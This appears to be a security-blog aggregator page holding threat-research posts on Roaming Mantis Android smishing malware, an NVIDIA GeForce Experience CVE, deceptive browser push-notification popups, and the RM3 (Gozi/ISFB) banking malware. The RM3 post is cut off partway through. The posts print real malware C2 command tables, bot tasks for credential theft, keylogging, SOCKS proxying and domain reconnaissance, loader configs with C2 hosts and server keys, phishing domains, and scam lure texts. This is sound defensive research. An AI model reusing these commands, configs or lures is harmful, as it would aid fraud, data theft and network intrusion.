Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Roaming Mantis Amplifies Smishing Campaign with OS-Specific Android Malware

5 May 2021 at 18:17
Quel antivirus choisir ?

The Roaming Mantis smishing campaign has been impersonating a logistics company to steal SMS messages and contact lists from Asian Android users since 2018. In the second half of 2020, the campaign improved its effectiveness by adopting dynamic DNS services and spreading messages with phishing URLs that infected victims with the fake Chrome application MoqHao.

Since January 2021, however, the McAfee Mobile Research team has established that Roaming Mantis has been targeting Japanese users with a new malware called SmsSpy. The malicious code infects Android users using one of two variants depending on the version of OS used by the targeted devices. This ability to download malicious payloads based on OS versions enables the attackers to successfully infect a much broader potential landscape of Android devices.

Smishing Technique

The phishing SMS message used is similar to that of recent campaigns, yet the phishing URL contains the term “post” in its composition.

Japanese message: I brought back your luggage because you were absent. please confirm. hxxps://post[.]cioaq[.]com

 

Fig: Smishing message impersonating a notification from a logistics company. (Source: Twitter)

Another smishing message pretends to be a Bitcoin operator and then directs the victim to a phishing site where the user is asked to verify an unauthorized login.

Japanese message: There is a possibility of abnormal login to your [bitFlyer] account. Please verify at the following URL: hxxps://bitfiye[.]com

 

Fig: Smishing message impersonating a notification from a bitcoin operator. (Source: Twitter)

During our investigation, we observed the phishing website hxxps://bitfiye[.]com redirect to hxxps://post.hygvv[.]com. The redirected URL contains the word “post” as well and follows the same format as the first screenshot. In this way, the actors behind the attack attempt to expand the variation of the SMS phishing campaign by redirecting from a domain that resembles a target company and service.

Malware Download

Characteristic of the malware distribution platform, different malware is distributed depending on the Android OS version that accessed the phishing page. On Android OS 10 or later, the fake Google Play app will be downloaded. On Android 9 or earlier devices, the fake Chrome app will be downloaded.

Japanese message in the dialog: “Please update to the latest version of Chrome for better security.”

Fig: Fake Chrome application for download (Android OS 9 or less)

 

Japanese message in the dialog: “[Important] Please update to the latest version of Google Play for better security!”

 

Fig: Fake Google Play app for download (Android OS 10 or above)

Because the malicious program code needs to be changed with each major Android OS upgrade, the malware author appears to cover more devices by distributing malware that detects the OS, rather than attempting to cover a smaller set with just one type of malware

Technical Behaviors

The main purpose of this malware is to steal phone numbers and SMS messages from infected devices. After it runs, the malware pretends to be a Chrome or Google Play app that then requests the default messaging application to read the victim’s contacts and SMS messages. It pretends to be a security service by Google Play on the latest Android device. Additionally, it can also masquerade as a security service on the latest Android devices. Examples of both are seen below.

Japanese message: “At first startup, a dialog requesting permissions is displayed. If you do not accept it, the app may not be able to start, or its functions may be restricted.”

 

Fig: Default messaging app request by fake Chrome app

 

Japanese message: “Secure Internet Security. Your device is protected. Virus and Spyware protection, Anti-phishing protection and Spam mail protection are all checked.”

Fig: Default messaging app request by fake Google Play app

After hiding its icon, the malware establishes a WebSocket connection for communication with the attacker’s command and control (C2) server in the background. The default destination address is embedded in the malware code. It further has link information to update the C2 server location in the event it is needed. Thus, if no default server is detected, or if no response is received from the default server, the C2 server location will be obtained from the update link.

The MoqHao family hides C2 server locations in the user profile page of a blog service, yet some samples of this new family use a Chinese online document service to hide C2 locations. Below is an example of new C2 server locations from an online document:

Fig: C2 server location described in online document

As part of the handshake process, the malware sends the Android OS version, phone number, device model, internet connection type (4G/Wi-Fi), and unique device ID on the infected device to the C2 server.

Then it listens for commands from the C2 server. The sample we analyzed supported the commands below with the intention of stealing phone numbers in Contacts and SMS messages.

Command String Description
通讯录 Send whole contact book to server
收件箱 Send all SMS messages to server
拦截短信&open Start <Delete SMS message>
拦截短信&close Stop <Delete SMS message>
发短信& Command data contains SMS message and destination number, send them via infected device

Table: Remote commands via WebSocket

Conclusion

We believe that the ongoing smishing campaign targeting Asian countries is using different mobile malware such as MoqHao, SpyAgent, and FakeSpy. Based on our research, the new type of malware discovered this time uses a modified infrastructure and payloads. We believe that there could be several groups in the cyber criminals and each group is developing their attack infrastructures and malware separately. Or it could be the work of another group who took advantage of previously successful cyber-attacks.

McAfee Mobile Security detects this threat as Android/SmsSpy and alerts mobile users if it is present and further protects them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com.

Appendix – IoC

C2 Servers:

  • 168[.]126[.]149[.]28:7777
  • 165[.]3[.]93[.]6:7777
  • 103[.]85[.]25[.]165:7777

Update Links:

  • r10zhzzfvj[.]feishu.cn/docs/doccnKS75QdvobjDJ3Mh9RlXtMe
  • 0204[.]info
  • 0130one[.]info
  • 210302[.]top
  • 210302bei[.]top

Phishing Domains:

Domain Registration Date
post.jpostp.com 2021-03-15
manag.top 2021-03-11
post.niceng.top 2021-03-08
post.hygvv.com 2021-03-04
post.cepod.xyz 2021-03-04
post.jposc.com 2021-02-08
post.ckerr.site 2021-02-06
post.vioiff.com 2021-02-05
post.cioaq.com 2021-02-04
post.tpliv.com 2021-02-03
posk.vkiiu.com 2021-02-01
sagawae.kijjh.com 2021-02-01
post.viofrr.com 2021-01-31
posk.ficds.com 2021-01-30
sagawae.ceklf.com 2021-01-30
post.giioor.com 2021-01-30
post.rdkke.com 2021-01-29
post.japqn.com 2021-01-29
post.thocv.com 2021-01-28
post.xkdee.com 2021-01-27
post.sagvwa.com 2021-01-25
post.aiuebc.com 2021-01-24
post.postkp.com 2021-01-23
post.solomsn.com 2021-01-22
post.civrr.com 2021-01-21
post.jappnve.com 2021-01-19
sp.vvsscv.com 2021-01-16
ps.vjiir.com 2021-01-15
post.jpaeo.com 2021-01-12
t.aeomt.com 2021-01-2

 

Sample Hash information:

Hash Package name Fake Application
EA30098FF2DD1D097093CE705D1E4324C8DF385E7B227C1A771882CABEE18362 com.gmr.keep Chrome
29FCD54D592A67621C558A115705AD81DAFBD7B022631F25C3BAAE954DB4464B com.gmr.keep Google Play
9BEAD1455BFA9AC0E2F9ECD7EDEBFDC82A4004FCED0D338E38F094C3CE39BCBA com.mr.keep Google Play
D33AB5EC095ED76EE984D065977893FDBCC12E9D9262FA0E5BC868BAD73ED060 com.mrc.keep Chrome
8F8C29CC4AED04CA6AB21C3C44CCA190A6023CE3273EDB566E915FE703F9E18E com.hhz.keeping Chrome
21B958E800DB511D2A0997C4C94E6F0113FC4A8C383C73617ABCF1F76B81E2FD com.hhz.keeping Google Play
7728EF0D45A337427578AAB4C205386CE8EE5A604141669652169BA2FBA23B30 com.hz.keep3 Chrome
056A2341C0051ACBF4315EC5A6EEDD1E4EAB90039A6C336CC7E8646C9873B91A com.hz.keep3 Google Play
054FA5F5AD43B6D6966CDBF4F2547EDC364DDD3D062CD029242554240A139FDB com.hz.keep2 Google Play
DD40BC920484A9AD1EEBE52FB7CD09148AA6C1E7DBC3EB55F278763BAF308B5C com.hz.keep2 Chrome
FC0AAE153726B7E0A401BD07C91B949E8480BAA0E0CD607439ED01ABA1F4EC1A com.hz.keep1 Google Play
711D7FA96DFFBAEECEF12E75CE671C86103B536004997572ECC71C1AEB73DEF6 com.hz.keep1 Chrome
FE916D1B94F89EC308A2D58B50C304F7E242D3A3BCD2D7CCC704F300F218295F com.hz.keep1 Google Play
3AA764651236DFBBADB28516E1DCB5011B1D51992CB248A9BF9487B72B920D4C com.hz.keep1 Chrome
F1456B50A236E8E42CA99A41C1C87C8ED4CC27EB79374FF530BAE91565970995 com.hz.keep Google Play
77390D07D16E6C9D179C806C83D2C196A992A9A619A773C4D49E1F1557824E00 com.hz.keep Chrome
49634208F5FB8BCFC541DA923EBC73D7670C74C525A93B147E28D535F4A07BF8 com.hz.keep Chrome
B5C45054109152F9FE76BEE6CBBF4D8931AE79079E7246AA2141F37A6A81CBA3 com.hz.keep Google Play
85E5DBEA695A28C3BA99DA628116157D53564EF9CE14F57477B5E3095EED5726 com.hz.keep Chrome
53A5DD64A639BF42E174E348FEA4517282C384DD6F840EE7DC8F655B4601D245 com.hz.keep Google Play
80B44D23B70BA3D0333E904B7DDDF7E19007EFEB98E3B158BBC33CDA6E55B7CB com.hz.keep Chrome
797CEDF6E0C5BC1C02B4F03E109449B320830F5ECE0AA6D194AD69E0FE6F3E96 com.hz.keep Chrome
691687CB16A64760227DCF6AECFE0477D5D983B638AFF2718F7E3A927EE2A82C com.hz.keep Google Play
C88C3682337F7380F59DBEE5A0ED3FA7D5779DFEA04903AAB835C959DA3DCD47 com.hz.keep Google Play

 

The post Roaming Mantis Amplifies Smishing Campaign with OS-Specific Android Malware appeared first on McAfee Blog.

CVE‑2021‑1079 – NVIDIA GeForce Experience Command Execution

By: voidsec
5 May 2021 at 07:11

NVIDIA GeForce Experience (GFE) v.<= 3.21 is affected by an Arbitrary File Write vulnerability in the GameStream/ShadowPlay plugins, where log files are created using NT AUTHORITY\SYSTEM level permissions, which lead to Command Execution and Elevation of Privileges (EoP). NVIDIA Security Bulletin – April 2021 NVIDIA Acknowledgements Page This blog post is a re-post of the […]

The post CVE‑2021‑1079 – NVIDIA GeForce Experience Command Execution appeared first on VoidSec.

How to Stop the Popups

5 May 2021 at 18:06

McAfee is tracking an increase in the use of deceptive popups that mislead some users into taking action, while annoying many others.  A significant portion is attributed to browser-based push notifications, and while there are a couple of simple steps users can take to prevent and remediate the situation, there is also some confusion about how these should be handled.

How does this happen?

In many cases scammers use deception to trick users into Allowing push notifications to be delivered to their system.

In other cases, there is no deception involved.  Users willingly opt-in uncoerced.

What happens next?

After Allowing notifications, messages quickly start being received.  Some sites send notifications as often as every minute.

Many messages are deceptive in nature.  Consider this fake alert example.  Clicking the message leads to an imposter Windows Defender alert website, complete with MP3 audio and a phone number to call.

In several other examples, social engineering is crafted around the McAfee name and logo.  Clicking on the messages lead to various websites informing the user their subscription has expired, that McAfee has detected threats on their system, or providing direct links to purchase a McAfee subscription.  Note that “Remove Ads” and similar notification buttons typically lead to the publishers chosen destination rather than anything that would help the user in disabling the popups.  Also note that many of the destination sites themselves prompt the user to Allow more notifications.  This can have a cascading effect where the user is soon flooded with many messages on a regular basis.

 

How can this be remediated?

First, it’s important to understand that the representative images provided here are not indications of a virus infection.  It is not necessary to update or purchase software to resolve the matter.  There is a simple fix:

1. Note the name of the site sending the notification in the popup itself. It’s located next to the browser name, for example:

Example popup with a link to a Popup remover

2. Go to your browser settings’ notification section

3. Search for the site name and click the 3 dotes next to the entry.

Chrome’s notification settings

4. Select Block

Great, but how can this be prevented in the future?

The simplest way is to carefully read such authorization prompts and only click Allow on sites that you trust.  Alternatively, you can disable notification prompts altogether.

As the saying goes, an ounce of prevention is worth a pound of cure.

What other messages should I be on the lookout for?

While there are thousands of various messages and sites sending them, and messages evolve over time, these are the most common seen in April 2021:

  • Activate Protection Now?|Update Available: Antivirus
  • Activate your free security today – Download now|Turn On Windows Protection ✅
  • Activate your McAfee, now! ✅|Click here to review your PC protection
  • Activate your Mcafee, now! ✅|Reminder From McAfee
  • Activate your Norton, now! ✅|Click here to review your PC protection
  • Activate Your PC Security ✅|Download your free Windows protection now.
  • Antivirus Gratis Installieren✅|Bestes Antivirus–Kostenlos herunterladen
  • Antivirus Protection|Download Now To Protect Your Computer From Viruses &amp; Malware Attacks
  • Best Antivirus 2020 – Download Free Now|Install Your Free Antivirus ✅
  • Check here with a Free Virus Scan|Is Windows slow due to virus?
  • Click here to activate McAfee protection|McAfee Safety Alert
  • Click here to activate McAfee protection|Turn on your antivirus
  • Click Here To Activate McAfee Protection|Upgrade Your Antivirus
  • Click here to activate Norton protection|Turn on your antivirus ✅
  • Click here to clean.|System is infected!
  • Click here to fix the error|Protect your PC now !
  • Click here to fix the error|System alert!
  • Click here to protect your data.|Remove useless files advised
  • Click Here To Renew Subscription|Viruses Found (3)
  • Click here to review your PC protection|⚠ Your Mcafee has Expired
  • Click here to Scan and Remove Virus|Potential Virus?
  • Click To Renew Your Subscription|Viruses Found (3)
  • Click to turn on your Norton protection|New (1) Security Notification
  • Critical Virus Alert|Turn on virus protection
  • Free Antivirus Update is|available.Download and protect system?
  • Install Antivirus Now!|Norton – Protect Your PC!
  • Install FREE Antivirus now|Is the system under threat?
  • Install free antivirus|Protect your Windows PC!
  • Jetzt KOSTENLOSES Antivirus installieren|Wird das System bedroht?
  • McAfee Safety Alert|Turn on your antivirus now [Activate]
  • McAfee Total Protection|Trusted Antivirus and Privacy Protection
  • Norton Antivirus|Stay Protected. Activate Now!
  • Norton Expired 3 Days Ago!⚠ |Renew now to stay protected for your PC!
  • PC is under virus threat! |Renew Norton now to say protected ⚠
  • Protect Your Computer From Viruses|⚠ Activate McAfee Antivirus
  • Renew McAfee License Now!|Stay Protected. Renew Now!
  • Renew McAfee License Now!|Your McAfee Has Expired Today
  • Renew Norton License Now!|Your Norton Has Expired Today
  • Renew Now For 2021|Your Norton has Expired Today?
  • Renew now to stay protected!|⚠ Your Mcafee has Expired
  • Scan Report Ready|Tap to reveal
  • Turn on virus protection|Viruses found (3)
  • Your Computer Might be At Risk ☠ |❌ Renew Norton Antivirus!

General safety tips

  • Scams can be quite convincing. It’s better to be quick to block something and slow to allow than the opposite.
  • When in doubt, initiate the communication yourself.
    • Manually enter in a web address rather than clicking a link sent to you.
    • Confirm numbers and addresses before reaching out, such as phone and email.
  • McAfee customers utilizing web protection (including McAfee Web Advisor and McAfee Web Control) are protected from known malicious sites.

The post How to Stop the Popups appeared first on McAfee Blog.

RM3 – Curiosities of the wildest banking malware

By: riftsle
4 May 2021 at 14:47

fumik0_ & the RIFT Team

TL:DR

Our Research and Intelligence Fusion Team have been tracking the Gozi variant RM3 for close to 30 months. In this post we provide some history, analysis and observations on this most pernicious family of banking malware targeting Oceania, the UK, Germany and Italy. 

We’ll start with an overview of its origins and current operations before providing a deep dive technical analysis of the RM3 variant. 

Introduction

Despite its long and rich history in the cyber-criminal underworld, the Gozi malware family is surrounded with mystery and confusion. The leaking of its source code only increased this confusion as it led to an influx of Gozi variants across the threat landscape.  

Although most variants were only short-lived – they either disappeared or were taken down by law enforcement – a few have had greater staying power. 

Since September 2019, Fox-IT/NCC Group has intensified its research into known active Gozi variants. These are operated by a variety of threat actors (TAs) and generally cause financial losses by either direct involvement in transactional fraud, or by facilitating other types of malicious activity, such as targeted ransomware activity. 

Gozi ISFB started targeting financial institutions around 2013-2015 and hasn’t stopped since then. It is one of the few – perhaps the only – main active branches of the notorious 15 year old Gozi / CRM. Its popularity is probably due to the wide range of variants which are available and the way threat actor groups can use these for their own goals. 

In 2017, yet another new version was detected in the wild with a number of major modifications compared to the previous main variant:

  • Rebranded RM loader (called RM3
  • Used exotic PE file format exclusively designed for this banking malware 
  • Modular architecture 
  • Network communication reworked 
  • New modules 

Given the complex development history of the Gozi ISFB forks, it is difficult to say with any certainty which variant was used as the basis for RM3. This is further complicated by the many different names used by the Cyber Threat Intelligence and Anti-Virus industries for this family of malware. But if you would like to understand the rather tortured history of this particular malware a little better, the research and blog posts on the subject by Check Point are a good starting point.

Banking malware targeting mainly Europe & Oceania

With more than four years of activity, RM3 has had a significant impact on the financial fraud landscape by spreading a colossal number of campaigns, principally across two regions:

  • Oceania, to date, Australia and New Zealand are the most impacted countries in this region. Threat actors seemed to have significant experience and used traditional means to conduct fraud and theft, mainly using web injects to push fakes or replacers directly into financial websites. Some of these injectors are more advanced than the usual ones that could be seen in bankers, and suggest the operators behind them were more sophisticated and experienced.
  • Europe, targeting primarily the UK, Germany and Italy. In this region, a manual fraud strategy was generally followed which was drastically different to the approach seen in Oceania.
Two different approaches to fraud used in Europe and Oceania

It’s worth noting that ‘Elite’ in this context means highly skilled operators. The injects provided and the C&C servers are by far the most complicated and restricted ones seen up to this date in the fraud landscape.

Fox-IT/NCC Group has currently counted at least eight* RM3 infrastructures:

  • 4 in Europe
  • 2 in Oceania (that seem to be linked together based on the fact that they share the same inject configurations)
  • 1 worldwide (using AES-encryption)
  • 1 unknown

Looking back, 2019 seems to have been a golden age (at least from the malware operators’ perspective), with five operators active at the same time. This golden age came to a sudden end with a sharp decline in 2020.

RM3 timeline of active campaigns seen in the wild

Even when some RM3 controllers were not delivering any new campaigns, they were still managing their bots by pushing occasional updates and inspecting them carefully. Then, after a number of weeks, they start performing fraud on the most interesting targets. This is an extremely common pattern among bank malware operators in our experience, although the reasons for this pattern remain unclear. It may be a tactic related to maintaining stealth or it may simply be an indication of the operators lagging behind the sheer number of infections.

The global pandemic has had a noticeable impact on many types of RM3 infrastructure, as it has on all malware as a service (MaaS) operations. The widespread lockdowns as a result of the pandemic have resulted in a massive number of bots being shut down as companies closed and users were forced to work from home, in some cases using personal computers. This change in working patterns could be an explanation for what happened between Q1 & Q3 2020, when campaigns were drastically more aggressive than usual and bot infections intensified (and were also of lower quality, as if it was an emergency). The style of this operation differed drastically from the way in which RM3 operated between 2018 and 2019, when there was a partnership with a distributor actor called Sagrid.

Analysis of the separate campaigns reveals that individual campaign infrastructures are independent from each of the others and operate their own strategies:

RM3 InfraTasksInjects
Financial VNC SOCKS
UK 1 No‡ Yes Yes Yes
UK 2 Yes No No No
Italy No‡ Yes Yes Yes
Australia/NZ 1 Yes Yes No‡ No
Australia/NZ 2 Yes Yes No‡ No
RM3 .at ??? ??? ??? ???
Germany ??? ??? ??? ???
Worldwide Yes No No No

Based on the web inject configuration file from config.bin
Based on active campaign monitoring, threat actor team(s) are mainly inspecting bots to manually push extra commands like VNC module for starting fraud activities.

A robust and stable distribution routine

As with many malware processes, renewing bots is not a simple, linear thing and many elements have to be taken into consideration:

  • Malware signatures
  • Packer evading AV/EDR
  • Distribution used (ratio effectiveness)
  • Time of an active campaign before being takedown by abuse

Many channels have been used to spread this malware, with distribution by spam (malspam) the most popular – and also the most effective. Multiple distribution teams are behind these campaigns and it is difficult to identify all of them; particularly so now, given the increased professionalisation of these operations (which now can involve shorter term, contractor like relationships). As a result, while malware campaign infrastructures are separate, there is now more overlap between the various infrastructures. It is certain however that one actor known as Sagrid was definitely the most prolific distributor. Around 2018/2019, Sagrid actively spread malware in Australia and New Zealand, using advanced techniques to deliver it to their victims.

RM3 distribution over the past 4 years

The graphic below shows the distribution method of an individual piece of RM3 malware in more detail.

A simplified path of a payload from its compilation to its delivery

Interestingly, the only exploit kit seen to be involved in the distribution of RM3 has been  Spelevo – at least in our experience. These days, Exploit Kits (EK) are not as active as in their golden era in the 2010s (when Angler EK dominated the market along with Rig and Magnitude). But they are still an interesting and effective technique for gathering bots from corporate networks, where updates are complicated and so can be delayed or just not performed. In other words, if a new bot is deployed using an EK, there is a higher chance that it is part of big network than one distributed by a more ‘classic’ malspam campaign.

Strangely, to this date, RM3 has never been observed targeting financial institutions in North America. Perhaps there are just no malicious actors who want to be part of this particular mule ecosystem in that zone. Or perhaps all the malicious actors in this region are still making enough money from older strains or another banking malware.

Nowadays, there is a steady decline in banking malware in general, with most TAs joining the rising and explosive ransomware trend. It is more lucrative for bank malware gangs to stop their usual business and try to get some exclusive contracts with the ransom teams. The return on investment (ROI) of a ransom paid by a victim is significantly higher than for the whole classic money mule infrastructure. The cost and time required in money mule and inject operations are much more complex than just giving access to an affiliate and awaiting royalties.

Large number of financial institutions targeted

Fox-IT/NCC Group has identified more than 130 financial institution targeted by threat actor groups using this banking malware. As the table below shows, the scope and impact of these attacks is particularly concentrated on Oceania. This is also the only zone where loan and job websites are targeted. Of course, targeting job websites provides them with further opportunities to hire money mules more easily within their existing systems.

CountryBanksWeb ShopsJob OffersLoansCrypto Services
UK281000
IT170000
AU/NZ80~0226

A short timeline of post-pandemic changes

As we’ve already said, the pandemic has had an impact across the entire fraud landscape and forced many TAs (not just those using RM3) to drastically change their working methods. In some cases, they have shut down completely in one field and started doing something else. For RM3 TAs, as for all of us, these are indeed interesting times.

Q3 2019 – Q2 2020, Classic fraud era

Before the pandemic, the tasks pushed by RM3 were pretty standard when a bot was part of the infrastructure. The example below is a basic check for a legitimate corporate bot with an open access point for a threat actor to connect to and start to use for fraud.

GET_CREDS
GET_SYSINFO
LOAD_MODULE=mail.dll,UXA
LOAD_KEYLOG=*
LOAD_SOCKS=XXX.XXX.XXX.XXX:XXXX

Otherwise, the banking malware was configured as an advanced infostealer, designed to steal data and intercept all keyboard interactions.

GET_CREDS
LOAD_MODULE=mail.dll,UXA
LOAD_KEYLOG=*

Q4 2020 – Now, Bot Harvesting Era

Nowadays, bots are basically  removed if they are coming from old infrastructures, if they are not part of an active campaign. It’s an easy way for them for removing researcher bots

DEL_CONFIG

Otherwise, this is a classic information gathering system operation on the host and network. Which indicates TAs are following the ransomware path and declining their fraud legacy step by step.

GET_SYSINFO
RUN_CMD=net group "domain computers" /domain
RUN_CMD=net session

RM3 Configs – Invaluable threat intelligence data

RM3.AT

Around the summer of 2019, when this banking malware was at its height, an infrastructure which was very different from the standard ones first emerged. It mostly used infostealers for distribution and pushed an interesting variant of the RM3 loader.

Based on configs, similarities with the GoziAT TAs were seen. The crossovers were:

  • both infrastructure are using the .at TLD
  • subdomains and domains are using the same naming convention
  • Server ID is also different from the default one (12)
  • Default nameservers config
  • First seen when GoziAT was curiously quiet

An example loader.ini file for RM3.at is shown below:

LOADER.INI - RM3 .AT example
{
    "HOSTS": [
        "api.fiho.at",
        "t2.fiho.at"
    ],
    "NAMESERVERS": [
        "172.104.136.243",
        "8.8.4.4",
        "192.71.245.208",
        "51.15.98.97",
        "193.183.98.66",
        "8.8.8.8"
    ],
    "URI": "index.htm",
    "GROUP": "3000",
    "SERVER": "350",
    "SERVERKEY": "s2olwVg5cU7fWsec",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "10",
    "HOSTKEEPTIMEOUT": "60",
    "DGATEMPLATE": "constitution.org/usdeclar.txt",
    "DGAZONES": [
        "com",
        "ru",
        "org"
    ],
    "DGATEMPHASH": "0x4eb7d2ca",
    "DGAPERIOD": "10"
}

As a reminder, the ISFB v2 variant called GoziAT (which technically uses the RM2 loader) uses the format shown below:

LOADER.INI - GoziAT/ISFB (RM2 Loader) 
{
    "HOSTS": [
        "api10.laptok.at/api1",
        "golang.feel500.at/api1",
        "go.in100k.at/api1"
    ],
    "GROUP": "1100",
    "SERVER": "730",
    "SERVERKEY": "F2oareSbPhCq2ch0",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "20",
    "HOSTSHIFTTIMEOUT": "1"
}

But this RM3 infrastructure disappeared just a few weeks later and has never been seen again. It is not known if the TAs were satisfied with the product and its results and it remains one of the unexplained curiosities of this banking malware

But, we can say this marked the return of GoziAT, which was back on track with intense campaigns.

Other domains related to this short lived RM3 infrastructure were.

  • api.fiho.at
  • y1.rexa.at
  • cde.frame303.at
  • api.frame303.at
  • u2.inmax.at
  • cdn5.inmax.at
  • go.maso.at
  • f1.maso.at

Standard routine for other infrastructures

Meanwhile, a classic loader config will mostly need standard data like any other malware:

  • C&C domains (called hosts on the loader side)
  • Timeout values
  • Keys

The example below shows a typical loader.ini file from a more ‘classic’ infrastructure. This one is from Germany, but similar configurations were seen in the UK1, Australia/New Zealand1 and Italian infrastructures:

LOADER.INI – DE 
{
    "HOSTS": "https://daycareforyou.xyz",
    "ADNSONLY": "0",
    "URI": "index.htm",
    "GROUP": "40000",
    "SERVER": "12",
    "SERVERKEY": "z2Ptfc0edLyV4Qxo",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "10",
    "HOSTKEEPTIMEOUT": "60",
    "DGATEMPLATE": "constitution.org/usdeclar.txt",
    "DGAZONES": [
        "com",
        "ru",
        "org"
    ],
    "DGATEMPHASH": "0x4eb7d2ca",
    "DGAPERIOD": "10"
}

Updates to RM3 were observed to be ongoing, and more fields have appeared since the 3009XX builds (e.g: 300912, 900932):

  • Configuring the self-removing process
  • Setup the loader module as the persistent one
  • The Anti-CIS (langid field) is also making a comeback

The example below shows a typical client.ini file as seen in build 3009xx from the UK2 and Australia/New Zealand 2 infrastructures:

CLIENT.INI 
{
    "HOSTS": "https://vilecorbeanca.xyz",
    "ADNSONLY": "0",
    "URI": "index.htm",
    "GROUP": "92020291",
    "SERVER": "12",
    "SERVERKEY": "kD9eVTdi6lgpH0Ml",
    "IDLEPERIOD": "10",
    "LOADPERIOD": "10",
    "HOSTKEEPTIMEOUT": "60",
    "NOSCRIPT": "0",
    "NODELETE": "0",
    "NOPERSISTLOADER": "0",
    "LANGID": "RU",
    "DGATEMPLATE": "constitution.org/usdeclar.txt",
    "DGATEMPHASH": "0x4eb7d2ca",
    "DGAZONES": [
        "com",
        "ru",
        "org"
    ],
    "DGAPERIOD": "10"
}

The client.ini file mainly stores elements that will be required for the explorer.dll module:

  • Timeouts values
  • Maximum size allowed for RM3 requests to the controllers
  • Video config
  • HTTP proxy activation
CLIENT.INI - Default Format
{
    "CONTROLLER": [
        "",
    ],
    "ADNSONLY": "0",
    "IPRESOLVERS": "curlmyip.net",
    "SERVER": "12",
    "SERVERKEY": "",
    "IDLEPERIOD": "300",
    "TASKTIMEOUT": "300",
    "CONFIGTIMEOUT": "300",
    "INITIMEOUT": "300",
    "SENDTIMEOUT": "300",
    "GROUP": "",
    "HOSTKEEPTIMEOUT": "60",
    "HOSTSHIFTTIMEOUT": "60",
    "RUNCHECKTIMEOUT": "10",
    "REMOVECSP": "0",
    "LOGHTTP": "0",
    "CLEARCACHE": "1",
    "CACHECONTROL": [
        "no-cache,",
        "no-store,",
        "must-revalidate"
    ],
    "MAXPOSTLENGTH": "300000",
    "SETVIDEO": [
        "30,",
        "8,",
        "notipda"
    ],
    "HTTPCONNECTTIME": "480",
    "HTTPSENDTIME": "240",
    "HTTPRECEIVETIME": "240"
}

What next?

Active monitoring of current in-the-wild instances suggests that the RM3 TAs are progressively switching to the ransomware path. That is, they have not pushed any updates on the fraud side of their operations for a number of months (by not pushing any injects), but they are still maintaining their C&C infrastructure. All infrastructure has a cost and the fact they are maintaining their C&C infrastructure without executing traditional fraud is a strong indication they are changing their strategy to another source of income.

The tasks which are being pushed (and old ones since May 2020) are triage steps for selecting bots which could be used for internal lateral movement. This pattern of behaviour is becoming more evident everyday in the latest ongoing campaigns, where everyone seems to be targeted and the inject configurations have been totally removed.

As a reminder, over the past two years banking malware gangs in general have been seen to follow this trend. This is due to the declining fraud ecosystem in general, but also due to the increased difficulty in finding inject developers with the skills to develop effective fakes which this decline has also prompted.

How banking TAs can migrate from fraud to ransom (or any other businesses)

We consider RM3 to be the most advanced ISFB strain to date, and fraud tools can easily be switched into a malicious red team like strategy.

RM3 evolving to support two different use cases at the same time

Why is RM3 the most advanced ISFB strain?

As we said, we consider RM3 to be the most advanced ISFB variant we have seen. When we analyse the RM3 payload, there is a huge gap between it and its predecessors. There are multiple differences:

  • A new PE format called PX has been developed
  • The .bss section is slightly updated for storing RM3 static variables
  • A new structure called WD based on the J1/J2/J3/JJ ISFB File Join system for storing files
Architecture differences between ISFB v2 and RM3 payload
(main sections discussed below)

PX Format

As mentioned, RM3 is designed to work with PX payloads (Portable eXecutable). This is an exotic file format created for, and only used with, this banking malware. The structure is not very different from the original PE format, with almost all sections, data directories and section tables remaining intact. Essentially, use of the new file format just requires malware to be re-crafted correctly in a new payload at the correct offset.

PX Header

BSS section

The bss section (Block Starting Symbol) is a critical data segment used by all strains of ISFB for storing uninitiated static local variables. These variables are encrypted and used for different interactions depending on the module in use.

In a compiled payload, this section is usually named “.bss0”. But evidence from a source code leak shows that this is originally named “.bss” in the source code. These comments also make it clear that this module is encrypted.

The encrypted .bss section

This is illustrated by the source code comments shown below:

// Original section name that will be created within a file
#define CS_SECTION_NAME ".bss0"
// The section will be renamed after the encryption completes.
// This is because we cannot use reserved section names aka ".rdata" or ".bss" during compile time.
#define CS_NEW_SECTION_NAME ".bss"

When working with ISFB, it is common to see the same mechanism or routine across multiple compiled builds or variants. However, it is still necessary to analyse them all in detail because slight adjustments are frequently introduced. Understanding these minor changes can help with troubleshooting and explain why scripts don’t work. The decryption routine in the bss section is a perfect example of this; it is almost identical to ISFB v2 variants, but the RM3 developers decided to tweak it just slightly by creating an XOR key in a different way – adding a FILE_HEADER.TimeDateStamp with the gs_Cookie (this information based on the ISFB leak).

Decrypted strings from the .bss section being parsed by IDA

Occasionally, it is possible to see a debugged and compiled version of RM3 in the wild. It is unknown if this behaviour is intended for some reason or simply a mistake by TA teams, but it is a gold mine for understanding more about the underlying code.

WD Struct

ISFB has its own way of storing and using embedded files. It uses a homemade structure that seems to change its name whenever there is a new strain or a major ISFB update:

  • FJ or J1 – Old ISFB era
  • J2 – Dreambot
  • J3 – ISFB v3 (Only seen in Japan)
  • JJ – ISFB v2 (v2.14+ – now)
  • WD – RM3 / Saigon

To get a better understanding of the latest structure in use, it is worth taking a quick look back at the active strains of ISFB v2 still known to use the JJ system.

The structure is pretty rudimentary and can be summarised like this:

struct JJ_Struct {
 DWORD xor_cookie;
 DWORD crc32;
 DWORD size;
 DWORD addr;
} JJ;

With RM3, they decided to slightly rework the join file philosophy by creating a new structure called WD. This is basically just a rebranded concept; it just adds the JJ structure (seen above) and stores it as a pointer array.

The structure itself is really simple:

struct WD_Struct {
  DWORD size;
  WORD magic;
  WORD flag;
  JJ_Struct *jj;
} WD;

In allRM3 builds, these structures simply direct the malware to grab an average of at least 4 files†:

  • A PX loader
  • An RSA pubkey
  • An RM3 config
  • A wordlist that will be mainly used for create subkeys in the registry

† The amount of files is dependent on the loader stage or RM3 modules used. It is also based on the ISFB variant, as another file could be present which stores the langid value (which is basically the anti-cis feature for this banking malware).

Architecture

Every major ISFB variant has something that makes it unique in some way. For example, the notorious Dreambot was designed to work as a standalone payload; the whole loader stage walk-through was removed and bots were directly pointed at the correct controllers. This choice was mainly explained by the fact that this strain was designed to work as malware as a service. It is fairly standard right now to see malware developers developing specific features for TAs – if they are prepared to pay for them. In these agreements, TAs can be guaranteed some kind of exclusivity with a variant or feature. However, this business model does also increase the risk of misunderstanding and overlap in term of assigning ownership and responsibility. This is one of the reasons it is harder to get a clear picture of the activities happening between malware developers & TAs nowadays.

But to get back to the variant we are discussing here; RM3 pushed the ISFB modular plugin system to its maximum potential by introducing a range of elements into new modules that had never been seen before. These new modules included:

